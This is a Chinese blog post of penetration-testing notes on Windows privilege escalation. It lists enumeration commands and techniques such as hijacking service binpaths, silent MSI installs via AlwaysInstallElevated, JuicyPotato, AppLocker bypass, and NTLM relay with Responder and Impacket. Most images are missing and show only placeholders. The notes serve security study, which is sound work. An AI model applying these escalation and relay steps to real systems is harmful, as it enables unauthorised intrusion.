内网渗透-权限提升

发布日期: 2021-06-23

Windows 单击权限提升

EXP提权
Unquoted service Path 提权
不安全的服务权限
AlwayslnstallElevated
通过利用弱文件夹权限来提升特权
无人值守安装
任务计划程序的特权升级
DLL劫持

Windows提权命令大全

systeminfo  		打印系统信息
whoami				获得当前用户名
whoami /priv		当前账户权限
net user			列出用户
net user UserName	关于用户的信息
net localgroup		列出所有组
tasklist /svc		列出服务任务
net start 			列出启动的服务
sc query			列出所有服务
sc qc ServiceName  	找到指定服务的路径

EXP提权

检查

systeminfo
wmic qfe get Caption,Description,HotFixID,InstalledOn
post/windows/gather/enum_patches
Windows-Exploit-Suggester
https://github.com/SecWiki/windows-kernel-exploits
https://www.exploit-db.com/local/
https://pentestlab.blog/2017/04/24/windows-kernel-exploits/

常见提权EXP

upload successful

windows提权exp—-gogo

linux提权exp—–gogo

通过利用弱文件夹权限来提升特权

确定写入权限:
icacls “C:\Program Files”

upload successful

“M” 表示修改
“F” 代表完全控制
“CI” 代表从属容器将继承访问控制项
“OI” 代表从属文件将继承访问控制项

upload successful

Unquoted service Path 提权

upload successful

不安全的服务权限

upload successful

查找用户可以修改的服务:accesschk.exe -uwcqv "user" *
查询服务: sc qc "Service"改服务的BINPATH:sc config “Vulnerable” binpath="c:\mailcious.exe"
sc stop "Vulnerble"
sc start "Vulnerble"
MS12 - 020
accesschk.exe -uwcqv "Everyone"
accesschk.exe -uwcqv "Authenticated Users"
accesschk.exe -uwcqv "Users"

AlwaysInstallElevated

MSI

非授权用户以SYSTEM权限运行安装文件(MSI)

查询:
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
执行
msiexec /quiet /qn /i C:\msi.msi

upload successful

无人值守安装

upload successful

任务计划程序的特权升级

upload successful

JuicyPotato

upload successful

本地支持RPC或远程服务器支持PRC并能成功登录
用户支持Selmpersonate或SeAssignPrimaryToken权限
开启DCOM
可用的COM对象
http://ohpe.it/juicy-potato/CLSID/

DLL

upload successful

PowerUp

upload successful

PowerUpSQL

upload successful

UAC

upload successful

Bypass UAC

upload successful

SRP

upload successful

AppLocker(应用锁)

upload successful

Bypass Applocker List

upload successful

Bypass Applocker Demo

upload successful

HTA Bypass Applocker

upload successful

NTLM Relay

upload successful

Get Traffic

WPA
DLLMNR\NetBIOS
IPV6

NTLM relay to SMB

Workstation Default Shutdown Sign
Workgroup Same PassWord

Find Disable SMB Signing

python RunFinger.py -i a target or target range

upload successful

Get Net-NTLM Hash

python Responder.py -i -r -d -wResponder.conf

upload successful

Responder.conf

upload successful

Relay Attck

upload successful

Get NTLM hash

Impacket

upload successful

Relay2SMB Tools

impacket

1
2
3

smbrelayx.py
ntlmrelayx.py
MultiRelay.py

Mitigate Relay Attck

upload successful

thirteensummer

https://thirteensummer.github.io/2021/06/23/nei-wang-shen-tou-quan-xian-ti-sheng/

本博客所有文章除特別声明外，均采用 CC BY 4.0 许可协议。转载请注明来源 thirteensummer !

加密 hasdes@123

内网渗透-打点

2021-06-23 thirteensummer

加密 hasdes@123

内网渗透-信息收集

2021-06-23 thirteensummer

内网渗透-权限提升

目录

Windows 单击权限提升

Windows提权命令大全

EXP提权

常见提权EXP

通过利用弱文件夹权限来提升特权

Unquoted service Path 提权

不安全的服务权限

AlwaysInstallElevated

无人值守安装

任务计划程序的特权升级

DLL

PowerUp

PowerUpSQL

UAC

Bypass UAC

SRP

AppLocker(应用锁)

Bypass Applocker List

Bypass Applocker Demo

HTA Bypass Applocker

NTLM Relay

Get Traffic

NTLM relay to SMB

Find Disable SMB Signing

Get Net-NTLM Hash

Responder.conf

Relay Attck

Get NTLM hash

Relay2SMB Tools

Mitigate Relay Attck

人生何处不相逢